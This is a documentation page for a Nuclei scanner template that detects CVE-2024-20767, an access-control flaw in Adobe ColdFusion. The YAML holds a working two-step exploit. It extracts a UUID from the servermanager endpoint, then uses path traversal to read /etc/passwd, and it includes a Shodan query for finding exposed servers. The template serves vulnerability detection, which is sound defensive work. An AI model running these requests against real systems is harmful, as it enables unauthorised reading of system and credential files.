Skip to content
Nuclei Templates

Adobe ColdFusion - Arbitrary File Read

ID: CVE-2024-20767

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2024,adobe,coldfusion,lfr,kev

Description

Section titled “Description”

ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.

YAML Source

Section titled “YAML Source”
id: CVE-2024-20767


info:
  name: Adobe ColdFusion - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.
  reference:
    - https://jeva.cc/2973.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-20767
    - https://helpx.adobe.com/security/products/coldfusion/apsb24-14.html
    - https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
    - https://github.com/Hatcat123/my_stars
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
    cvss-score: 8.2
    cve-id: CVE-2024-20767
    cwe-id: CWE-284
    epss-score: 0.08221
    epss-percentile: 0.94345
    cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.component:"Adobe ColdFusion"
    product: coldfusion
    vendor: adobe
  tags: cve,cve2024,adobe,coldfusion,lfr,kev


http:
  - raw:
      - |
        GET /hax/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /hax/../pms?module=logging&file_name=../../../../../../../../../../../../../../../../../../etc/passwd&number_of_lines=1000 HTTP/1.1
        Host: {{Hostname}}
        uuid: {{extracted_uuid}}


    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(body_1, 'wddxPacket')"
          - "contains(header_2, 'application/json')"
          - "contains(body_2, '/bin/bash')"
        condition: and


    extractors:
      - type: regex
        part: body_1
        name: extracted_uuid
        group: 1
        regex:
          - "<var name='uuid'><string>(.*)</string>"
        internal: true
# digest: 4a0a00473045022100d2d1ed47cf7224bcd242719e9f794ea0dacffeab31038cdada43f9c19c623e7e022018414090737358b9e99590d6def16a8517b94cf74b32063b966ae79e99583d84:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-20767.yaml"

View on Github